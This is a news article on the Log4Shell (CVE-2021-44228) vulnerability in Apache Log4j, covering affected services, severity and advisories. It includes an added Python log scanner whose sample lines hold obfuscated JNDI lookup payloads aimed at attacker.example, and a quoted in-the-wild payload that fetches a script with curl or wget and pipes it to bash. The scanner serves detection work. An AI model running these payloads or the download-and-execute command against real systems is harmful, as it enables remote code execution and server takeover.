Zero-day exploits are about as bad as it gets, especially when they’re identified in software as ubiquitous as Apache’s Log4j logging library. A proof-of-concept exploit was shared online that exposes everyone to potential remote code execution (RCE) attacks, and it affected some of the largest services on the web. The exploit has been identified as “actively being exploited”, and is one of the most dangerous exploits to be made public in recent years.
Log4j is a popular Java-based logging package developed by the Apache Software Foundation, and CVE-2021-44228 affects all versions of Log4j between version 2.0-beta-9 and version 2.14.1. It has been patched in the most recent version of the library, version 2.15.0, released a few days ago. Many services and applications rely on Log4j, including games like Minecraft, where the vulnerability was first discovered. Cloud services such as Steam and Apple iCloud were also found to be vulnerable, and it’s likely that anybody using Apache Struts is too. Even changing an iPhone’s name was shown to trigger the vulnerability on Apple’s servers.
This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. Any service that logs user-controlled strings was vulnerable to the exploit. Logging user-controlled strings is common practice for system administrators who want to spot potential platform abuse, but those strings should then be “sanitized” — that is, user input should be cleaned so that nothing harmful to the software is passed along.
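Since the risk comes from user-controlled strings reaching the logger, one practical defensive step is to scan existing logs for the lookup syntax this vulnerability abuses. The Python below is an added example written for this article, not code from the article, Apache, or any of the vendors mentioned. It normalizes the common obfuscation forms of Log4j lookups (lower/upper case lookups and default-value lookups) and then flags any line that contains a JNDI lookup, reporting the URL scheme involved. The access log lines are constructed for the example; the host names in them are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample access log lines (not from the article). Lines 2-4 carry
# lookup strings in the User-Agent or query string; line 5 is a benign request
# that merely mentions "jndi" and must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: a body with no nested braces.
LOOKUP_INNER = re.compile(r"\$\{([^{}]*)\}")

# A JNDI lookup after normalization, capturing the scheme (ldap, rmi, dns, ...).
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve_inner(match: "re.Match") -> str:
    """Resolve one innermost lookup the way Log4j's obfuscation tricks rely on.

    Only the forms that an attacker uses to hide the literal text "jndi" are
    resolved here: ${lower:X}, ${upper:X} and the default-value form ${...:-X}.
    Anything else is left untouched so the scan never loops forever.
    """
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j} and ${::-j} both evaluate to their default value "j".
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new_text = LOOKUP_INNER.sub(_resolve_inner, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line that contains a JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        match = JNDI_PATTERN.search(normalized)
        if match:
            hits.append(
                {
                    "line": number,
                    "scheme": match.group(1).lower(),
                    "normalized": normalized,
                    "raw": line,
                }
            )
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
        print(f"  normalized: {hit['normalized']}")
```

The scan deliberately works on the normalized form rather than on the raw bytes, because a plain substring search for "${jndi:" misses the nested-lookup variants seen in real traffic, while the normalized match still ignores harmless text such as a documentation path containing the word "jndi". Treat a hit as an indicator for investigation, not proof of compromise: whether the lookup was actually resolved depends on the Log4j version and configuration of the service that logged it.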
Log4Shell rivals Heartbleed in its severity
The exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online, and it’s ridiculously easy to demonstrate that it works through the use of DNS logging software. If you remember the Heartbleed vulnerability from a number of years ago, Log4Shell definitely gives it a run for its money when it comes to severity.
“Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said in their blog today. “Due to the ease of exploitation and the breadth of applicability, we suspect ransomware actors to begin leveraging this vulnerability immediately,” they added. Malicious actors are already mass-scanning the web to try and find servers to exploit (via Bleeping Computer).
Example CVE-2021-44228 payload:
(curl -s 220.127.116.11/lh.sh||wget -q -O- 18.104.22.168/lh.sh)|bash
22.214.171.124 (🇷🇺) pic.twitter.com/LKdaZ9Lfos
— Bad Packets (@bad_packets) December 10, 2021
“Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” LunaSec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.” LunaSec also said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less affected in theory, though hackers may still be able to work around the limitations.
The vulnerability can be triggered by something as mundane as an iPhone’s name, demonstrating that Log4j truly is everywhere. If a Java class is appended to the end of the URL, then that class will be injected into the server process. System administrators with recent versions of Log4j can execute their JVM with the following argument to also prevent the vulnerability from being exploited, so long as they’re on at least Log4j 2.10.
CERT NZ (New Zealand’s national Computer Emergency Response Team) has issued a security advisory warning of active exploitation in the wild, and this has also been confirmed by Coalition Director Of Engineering – Security Tiago Henriques and security expert Kevin Beaumont. The vulnerability has also been deemed so dangerous by Cloudflare that all customers are granted “some” protection by default.
We’ve made the determination that #Log4J is so bad we’re going to try and roll out at least some protection for all @Cloudflare customers by default, even free customers who do not have our WAF. Working on how to do that safely now.
— Matthew Prince 🌥 (@eastdakota) December 10, 2021
This is an incredibly dangerous exploit and one that can wreak havoc online. We’ll be keeping a close eye on what happens next.